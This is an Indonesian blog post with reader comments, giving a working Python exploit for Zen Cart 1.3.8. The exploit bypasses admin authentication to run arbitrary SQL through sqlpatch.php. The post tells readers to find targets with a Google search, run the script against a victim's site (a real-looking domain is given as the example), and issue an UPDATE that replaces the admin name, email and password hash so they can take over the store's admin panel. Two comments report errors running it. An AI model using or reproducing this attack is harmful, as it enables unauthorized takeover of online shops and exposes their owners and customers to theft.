[::::: Rey_666 Blog :::::]: Bugs Zen Cart

Buka google ketik : powered by zen cart™ Nama Negara

Terus Copas neeh script :

#!/usr/bin/python

#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#

#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
# DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
# DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';

import urllib, urllib2, re, sys

a,b = sys.argv,0

def option(name, need = 0):
 global a, b
 for param in sys.argv:
  if(param == '-'+name): return str(sys.argv[b+1])
  b = b + 1
 if(need):
  print '\n#error', "-"+name, 'parameter required'
  exit(1)

if (len(sys.argv) < 2):
 print """
=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit  ____________=
========================================================================
|                  BlackH                           |
========================================================================
|                                                                      |
| $system> python """+sys.argv[0]+""" -url                                  |
| Param:       ex: http://victim.com/site (no slash)              |
|                                                                      |
| Note: blind "injection"                                              |
========================================================================
 """
 exit(1)
 
url, trick = option('url', 1), "/password_forgotten.php"

while True:
 cmd = raw_input('sql@jah$ ') 
 if (cmd == "exit"): exit(1)
 req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
 if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
  print '>> success (', cmd, ")"
 else:
  print '>> failed, be sure to end with ; (', cmd, ")"

tuh pithon save dgn extensi zen.py

sebelum nya komputer kamu instal dlu pithon nya , kalo blum aja download aja di : http://www.python.org/ftp/python/2.5/python-2.5.msi

kalo udah buka cmd
misal zen.py kamu taruh di desktop bearti cmd kamu arahin ke desktop dlu

kalo udah ketik : zen.py -url htttp://webkorban.com
contohh : zen.py -url http://customizthat.com/2010/admin/ <--enter
trus nanti ada tulisan $sql@jah
aklo ada tulisan itu bearti masukin perintah : UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; trus enter

kalo berhasil maka akan muncul kayak ini : >> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.
com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; )
sql@jah$

contoh nya nih ss nya :

kalo udah succes, tinggal di url target ditambahin /admin/
kalo succes setiap username sama pasword nya itu adminz : wew

2 komentar:

endar13 April 2010 pukul 13.36
om kayaknya udah ga bisa ya ??
kok failed munculnya
BalasHapus
Balasan
Anonim29 Juni 2010 pukul 19.25
ku dapat error begini..

Traceback (most recent call last):
File "zen.py", line 53, in
if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
File "C:\Python25\lib\urllib2.py", line 124, in urlopen
return _opener.open(url, data)
File "C:\Python25\lib\urllib2.py", line 387, in open
response = meth(req, response)
File "C:\Python25\lib\urllib2.py", line 498, in http_response
'http', request, response, code, msg, hdrs)
File "C:\Python25\lib\urllib2.py", line 425, in error
return self._call_chain(*args)
File "C:\Python25\lib\urllib2.py", line 360, in _call_chain
result = func(*args)
File "C:\Python25\lib\urllib2.py", line 506, in http_error_default
raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
urllib2.HTTPError: HTTP Error 404: Not Found
BalasHapus
Balasan